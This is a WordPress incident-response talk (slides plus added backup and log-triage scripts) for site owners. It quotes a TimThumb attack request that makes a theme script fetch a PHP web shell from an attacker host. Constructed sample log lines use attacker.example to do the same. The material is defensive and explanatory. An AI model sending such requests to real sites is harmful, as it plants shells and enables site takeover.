Are you ready to be hacked?

This is the presentation I used during the awesome "WPSession #11: Security for Site Owners". I shared important information about how site owners should react to website attacks. I talked about risk management, asset evaluation and getting help from the right people who know WordPress and care about security.

  1. ARE YOU READY TO BE HACKED? Daniel Kanchev @dvkanchev May 17th, 2014
  2. WHO AM I?
     • 7+ years of WordPress experience
     • 5 years with SiteGround
     • Love FOSS
     • Security freak
     • Addicted to extreme sports
     Daniel Kanchev
  3. IN THIS SESSION
     • Why Should YOU Care
     • Assets Evaluation
     • Getting Help
     • A KISS Disaster Recovery Plan
     • Conclusion
  4. WHY MEEEEEEEE ???
  5. IN 2013, 61% OF TARGETED ATTACKS WERE AIMED AT SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012. Source: Symantec Internet Security Threat Report 2014, Volume 19, published April 2014
  6. 77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1 IN 8 HAD A CRITICAL VULNERABILITY. Source: Symantec ISTR 2014, Volume 19
  7. MEGA BREACHES: PERSONAL DETAILS OF OVER 10 MILLION IDENTITIES EXPOSED IN A SINGLE INCIDENT. Source: Symantec ISTR 2014, Volume 19
  8. THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012! +700% Source: Symantec ISTR 2014, Volume 19
  9. ATTACKS PER DAY
     2010: 190,000
     2012: 464,000
     2013: 570,000
     Source: Symantec ISTR 2014, Volume 19
  10. ASSETS EVALUATION
  11. MODULAR DESIGN
      • Divide your site into logical components
      • Allocate a weight to each component
      • Sort the components by criticality
  12. EXAMPLE TABLE (higher weight = more critical)
      Component            Weight
      WooCommerce plugin   4
      Custom theme         3
      Gallery plugin       2
      Contact form         1
  13. GETTING HELP
  14. IDENTIFY WHO CAN HELP YOU
      • The support team of your web host
      • Plugin and theme developers
      • Third-party companies
      • Security specialists
  15. THE SUPPORT TEAM OF YOUR WEB HOST
      • Website diagnostics
      • Website backups and restores
      • Log analysis
      • WordPress core/plugin/theme upgrades
      • Regular security audits
      • Malware notifications and malicious code cleaning
  16. PLUGIN AND THEME DEVELOPERS/SUPPORT
      • New plugin/theme versions
      • Security updates
      • Migration to new versions of your themes/plugins
  17. DISASTER RECOVERY PLAN
  18. 7 "EASY" STEPS
      1. DON'T PANIC!
      2. Create a copy of the hacked site + all logs
      3. Quarantine your site
      4. Remove the malicious code
      5. Check the archived logs for the source of the attack
      6. Resolve the security issues that caused the problem
      7. "Unquarantine" your site
  19. 1. BACKUP YOUR HACKED SITE
      How to back up:
        1. mysqldump -uU -pP DB > yoursitefolder/DB.sql
        2. tar zcvf backup.tar.gz yoursitefolder
      (The dump is written inside the site folder so that the tar archive picks it up. A password given as -pP ends up in your shell history; a MySQL option file avoids that.)
      Why do this: so that you can later find out the source of the attack/vulnerability!
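A worked version of the backup step, added here as an example and not taken from the slides: it reads the database credentials out of wp-config.php, writes a mode-0600 option file so the password never appears on the mysqldump command line, and tars the site together with copies of the logs, recording a SHA-256 of the archive so the copy can later be shown to be unmodified. Function names, the evidence directory and the paths in the usage comment are assumptions.

```shell
#!/usr/bin/env sh
# Added example: snapshot a hacked WordPress site (files + DB + logs) for later analysis.
# Not from the slides; function names and paths are assumptions for illustration.
set -eu

# Print the value of define('NAME', 'value') from wp-config.php (first match wins).
wp_config_get() {           # $1 = wp-config.php, $2 = constant name
  awk -v k="$2" -F"['\"]" \
    '$0 ~ "^[ \t]*define[ \t]*\\(" && $2 == k { print $4; exit }' "$1"
}

# Write a MySQL option file (mode 0600) for mysqldump. A -pPASSWORD on the command
# line stays in shell history and is briefly visible in the process list.
write_mysql_cnf() {         # $1 = wp-config.php, $2 = option file to create
  user=$(wp_config_get "$1" DB_USER)
  pass=$(wp_config_get "$1" DB_PASSWORD)
  hostport=$(wp_config_get "$1" DB_HOST)
  host=${hostport%%:*}
  (
    umask 077
    printf '[client]\nuser=%s\npassword="%s"\nhost=%s\n' "$user" "$pass" "${host:-localhost}" > "$2"
    case $hostport in *:*) printf 'port=%s\n' "${hostport#*:}" >> "$2" ;; esac
  )
}

# Dump the database via the option file (--defaults-extra-file must come first).
dump_db() {                 # $1 = wp-config.php, $2 = option file, $3 = output .sql
  db=$(wp_config_get "$1" DB_NAME)
  mysqldump --defaults-extra-file="$2" --single-transaction --routines --triggers "$db" > "$3"
}

# Copy the logs next to the site, tar everything with permissions and mtimes intact
# (mtimes are evidence: they show when files were dropped or changed), and hash the archive.
snapshot_site() {           # $1 = site dir, $2 = evidence dir, $3.. = log files to keep
  site=$1; dest=$2; shift 2
  mkdir -p "$dest/logs"
  for f in "$@"; do
    if [ -r "$f" ]; then cp -p "$f" "$dest/logs/"; else echo "warning: cannot read $f" >&2; fi
  done
  tar -czpf "$dest/site.tar.gz" -C "$(dirname "$site")" "$(basename "$site")" -C "$dest" logs
  if command -v sha256sum >/dev/null 2>&1; then
    (cd "$dest" && sha256sum site.tar.gz > site.tar.gz.sha256)
  else
    (cd "$dest" && shasum -a 256 site.tar.gz > site.tar.gz.sha256)
  fi
}

# Typical use, before touching anything else on the site (paths are examples):
#   write_mysql_cnf /home/user/public_html/wp-config.php /root/wp.cnf
#   dump_db /home/user/public_html/wp-config.php /root/wp.cnf /home/user/public_html/DB.sql
#   snapshot_site /home/user/public_html /root/evidence \
#     /usr/local/apache/domlogs/example.com /var/log/messages /var/log/secure
```

Keep the evidence directory outside the web root and outside the site folder, and hand the archive plus its .sha256 to whoever does the log analysis; the dump goes into the site folder first so that the files and the database end up in one archive.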
  20. USEFUL LOGS (on a cPanel server)
      • /var/log/messages - FTP log for PureFTPd
      • /usr/local/apache/domlogs/DOMAIN.COM - Apache access log
      • /var/log/exim_mainlog - Exim mail server log
      • /usr/local/cpanel/logs/access_log - cPanel File Manager log
      • /var/log/secure - SSH connections log
  21. 2. QUARANTINE YOUR SITE + CHANGE PASSWORDS
      1. Protect your users and visitors
      2. Keep Google from indexing your hacked site
      3. Keep hackers away while the site is being cleaned
  22. USE .HTACCESS MAGIC
      <IfModule mod_rewrite.c>
        RewriteEngine On
        # Your own address stays allowed; escape the dots and anchor the match so that
        # 123.56.89.120 is not let through as well
        RewriteCond %{REMOTE_ADDR} !^123\.56\.89\.12$
        RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f
        RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f
        RewriteCond %{SCRIPT_FILENAME} !maintenance\.html
        # 503 tells search engines the outage is temporary; for a non-3xx code mod_rewrite
        # drops the substitution anyway, so "-" is used and ErrorDocument serves the page
        RewriteRule ^.*$ - [R=503,L]
        ErrorDocument 503 /maintenance.html
      </IfModule>
      <IfModule mod_headers.c>
        # "always" is required, otherwise the headers are only set on 2xx responses
        Header always set Retry-After "14400"
        Header always set Cache-Control "max-age=0, no-store"
      </IfModule>
      Check from an address that is not on the allow list: curl -sI http://example.com/ should show "503" on the status line together with the Retry-After header. Delete maintenance.enable to switch the block off.
  23. 3. REMOVE THE MALICIOUS CODE
      1. Restore the site from a clean backup (one taken before the first attacker request you can find in the logs)
      OR
      2. Clean the affected files/database tables
  24. 4. ARCHIVED LOGS ANALYSIS
      • Is complicated
      • Is time consuming
      • Requires advanced HTTP knowledge
      • Should be performed by security specialists
  25. EXAMPLE - THE TIMTHUMB HACK
      189.100.29.167 - - [12/Apr/2014:06:53:41 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.ex l.ro/max/wp-mails.php HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
      189.100.29.167 - IP of the attacker.
      premiumtheme/timthumb.php - Vulnerable script.
      wp-mails.php - PHP shell script.
      The src host is crafted to contain a trusted domain name (blogger.com): vulnerable TimThumb versions checked the allowed-domain list by substring match, so the script fetched the attacker's PHP file and wrote it into the theme's cache directory, from where it could then be requested directly.
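The log analysis of step 4, as an added example rather than anything from the slides: a few constructed access-log lines (the attacker IP, the timthumb.php path and the user agent mirror the slide's line; the src host, the cache file name and the other client addresses are made up) and shell functions that pull out TimThumb requests fetching a remote src, the IPs behind them, everything else those IPs did, and successful hits on PHP files inside a TimThumb cache directory, which is where the fetched file lands. Function names are assumptions.

```shell
#!/usr/bin/env sh
# Added example: triage an Apache access log for the TimThumb remote-file attack.
# The log lines below are constructed; only the 189.100.29.167 request mirrors the slide.
set -eu

sample_log() {
  cat <<'EOF'
203.0.113.7 - - [12/Apr/2014:06:50:02 +1000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2014:06:50:05 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=wp-content/uploads/logo.jpg&w=100 HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
189.100.29.167 - - [12/Apr/2014:06:53:41 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.attacker.example/max/wp-mails.php HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
189.100.29.167 - - [12/Apr/2014:06:53:42 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http%3A%2F%2Fwww.blogger.com.attacker.example%2Fmax%2Fwp-mails.php HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
189.100.29.167 - - [12/Apr/2014:06:53:44 +1000] "GET /wp-content/themes/premiumtheme/cache/external_3a7f.php HTTP/1.1" 200 1422 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
189.100.29.167 - - [12/Apr/2014:06:54:10 +1000] "POST /wp-content/themes/premiumtheme/cache/external_3a7f.php HTTP/1.1" 200 88 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.23 - - [12/Apr/2014:07:01:00 +1000] "GET /wp-login.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
EOF
}

# Combined log format: $1 = client IP, $7 = request path, $9 = status code.

# Requests to timthumb.php whose src is a remote URL (plain or %-encoded scheme).
# A local src such as wp-content/uploads/logo.jpg is normal and is not reported.
timthumb_remote_src() {     # $1 = log file
  awk '$7 ~ /timthumb\.php\?/ && $7 ~ /src=(https?:\/\/|https?%3[Aa]%2[Ff]%2[Ff])/' "$1"
}

# Unique client IPs behind those requests.
suspect_ips() {             # $1 = log file
  timthumb_remote_src "$1" | awk '{ print $1 }' | sort -u
}

# Everything a given IP did, in log order; the first line gives the time of first contact,
# which is the latest point a backup may be taken from to still count as clean.
requests_from() {           # $1 = log file, $2 = IP
  awk -v ip="$2" '$1 == ip' "$1"
}

# Successful requests for PHP files inside a cache directory: TimThumb stores the fetched
# "image" there, and the attacker calls it directly to run the shell.
cache_php_hits() {          # $1 = log file
  awk '$7 ~ /\/cache\/[^\/?]*\.php(\?|$)/ && $9 == 200' "$1"
}
```

Run the same functions against the real domlog (/usr/local/apache/domlogs/DOMAIN.COM on cPanel): the output of `suspect_ips` feeds `requests_from`, and anything `cache_php_hits` reports with a 200 is a file that must be deleted from the cache directory and treated as an executed web shell, not just as a stray download.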
  26. 5. RESOLVE THE SECURITY ISSUES
      • Upgrade WP core, plugins and themes
      • Upgrade server software if needed
      • Patch your code and use a WAF in case there are no upgrades available
  27. 6. UNQUARANTINE YOUR SITE + CHANGE PASSWORDS
      • Remove the maintenance page
      • Inform users about the breach if needed
      • Keep an eye on your files/DB
  28. CONCLUSION
      • Web security is complicated!
      • Rely on partners to recover your site.
      • Be ready to manage the whole process.
      • Know your assets.
      • Make sure you have good security awareness.
      • Security is a journey - NOT a destination!
  29. THANK YOU
